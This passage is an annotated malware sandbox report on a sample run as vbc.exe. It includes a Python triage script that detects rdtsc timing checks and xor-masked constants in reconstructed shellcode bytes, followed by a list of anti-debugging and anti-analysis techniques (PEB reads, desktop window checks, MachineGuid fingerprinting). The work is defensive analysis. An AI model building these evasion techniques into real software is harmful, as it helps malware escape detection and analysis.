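The interceptor listing under "Tries to detect virtualization through RDTSC time measurements" is the whole technique in 26 bytes: two rdtsc reads 24 bytes apart, framed by popad/pushad, with a mov ecx, imm32 / xor ecx, imm32 pair in between that hides the constant the code actually wants. The following added example (ours, not from the report and not GuLoader tooling) encodes that listing as bytes and runs two static checks over it: find rdtsc instructions that are followed by another rdtsc within a short window, and fold adjacent mov/xor immediates into the value they produce. The byte encoding is reconstructed by hand from the mnemonics, which is an assumption, since the report prints no bytes; the decoder deliberately knows only the opcodes in that listing, and a real triage script would hand decoding to Capstone and keep the same two checks.

```python
"""Spot rdtsc timing checks and xor-masked constants in a shellcode blob.

Added example.  SAMPLE is the hand-reconstructed byte encoding of the
instruction listing the sandbox printed for 0x3D9277..0x3D928F (the
report shows mnemonics only, so the bytes are an assumption).  The
decoder covers just the opcodes that appear there; use Capstone for
real samples and keep rdtsc_pairs()/fold_constants() as they are.
"""
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def decode_one(buf, off):
    """Return (length, mnemonic, reg, imm) for the instruction at off.

    Known: rdtsc (0F 31), pushad (60), popad (61), mov r32, imm32 (B8+r),
    xor r32, imm32 (81 /6 with mod=11), mov [edi+ecx], eax (89 04 0F).
    Anything else is treated as one opaque byte so the sweep continues.
    """
    rem = len(buf) - off
    b0 = buf[off]
    if b0 == 0x0F and rem >= 2 and buf[off + 1] == 0x31:
        return 2, "rdtsc", None, None
    if b0 == 0x60:
        return 1, "pushad", None, None
    if b0 == 0x61:
        return 1, "popad", None, None
    if 0xB8 <= b0 <= 0xBF and rem >= 5:
        return 5, "mov", REG32[b0 - 0xB8], struct.unpack_from("<I", buf, off + 1)[0]
    if b0 == 0x81 and rem >= 6 and (buf[off + 1] & 0xF8) == 0xF0:   # modrm 11 110 rrr
        return 6, "xor", REG32[buf[off + 1] & 7], struct.unpack_from("<I", buf, off + 2)[0]
    if buf[off:off + 3] == b"\x89\x04\x0f":
        return 3, "mov [edi+ecx], eax", None, None
    return 1, "db", None, None


def disassemble(buf):
    """Linear sweep; yields (offset, mnemonic, reg, imm)."""
    off = 0
    while off < len(buf):
        n, mn, reg, imm = decode_one(buf, off)
        yield off, mn, reg, imm
        off += n


def rdtsc_pairs(buf, window=64):
    """(first, second) offsets of rdtsc reads no more than window bytes apart.

    Two reads that close together bracket a timing measurement; the junk
    between them is what the sandbox calls instruction hammering.
    """
    offs = [o for o, mn, _, _ in disassemble(buf) if mn == "rdtsc"]
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= window]


def fold_constants(buf):
    """Resolve 'mov reg, A' immediately followed by 'xor reg, B' to reg = A ^ B."""
    insns = list(disassemble(buf))
    out = []
    for (o1, m1, r1, i1), (_, m2, r2, i2) in zip(insns, insns[1:]):
        if m1 == "mov" and m2 == "xor" and r1 == r2:
            out.append((o1, r1, (i1 ^ i2) & 0xFFFFFFFF))
    return out


# Reconstructed bytes (assumption) for the report's listing:
#   rdtsc; popad; xor ecx,AF55D2FDh; mov [edi+ecx],eax;
#   mov ecx,C83BC8F2h; xor ecx,51282A31h; pushad; rdtsc
SAMPLE = bytes.fromhex(
    "0f31" "61" "81f1fdd255af" "89040f"
    "b9f2c83bc8" "81f1312a2851" "60" "0f31"
)

if __name__ == "__main__":
    for off, mn, reg, imm in disassemble(SAMPLE):
        print(f"{off:04x}  {mn}" + (f" {reg}, {imm:08X}h" if reg else ""))
    print("rdtsc pairs:", rdtsc_pairs(SAMPLE))
    print("folded:", [(hex(o), r, hex(v)) for o, r, v in fold_constants(SAMPLE)])
```

Two caveats for using this on real memory dumps. A linear sweep over data will hit 0F 31 by accident, so the window check and the pushad/popad framing matter more than the raw opcode count; the sandbox's dynamic interceptor sidesteps that problem entirely by catching the instruction as it executes. And the folded value (ecx = 9913E2C3h here) is only meaningful once you know what the surrounding code does with it; the point of the pair is that neither immediate on its own is the constant a YARA rule would match.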

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3063 rdtsc 6_2_003D3063
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3063 mov eax, dword ptr fs:[00000030h] 6_2_003D3063
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8167 mov eax, dword ptr fs:[00000030h] 6_2_003D8167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D732C mov eax, dword ptr fs:[00000030h] 6_2_003D732C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2531 mov eax, dword ptr fs:[00000030h] 6_2_003D2531
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4E17 mov eax, dword ptr fs:[00000030h] 6_2_003D4E17
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7730 mov eax, dword ptr fs:[00000030h] 6_2_003D7730

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp Binary or memory string: !Progman
Note: Program Manager, Shell_TrayWnd and Progman are the window title and class names of the Windows desktop shell; looking them up is a cheap check that a real interactive desktop exists rather than a headless analysis session.
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (a stable per-installation identifier, read to fingerprint the host and to recognise known analysis images)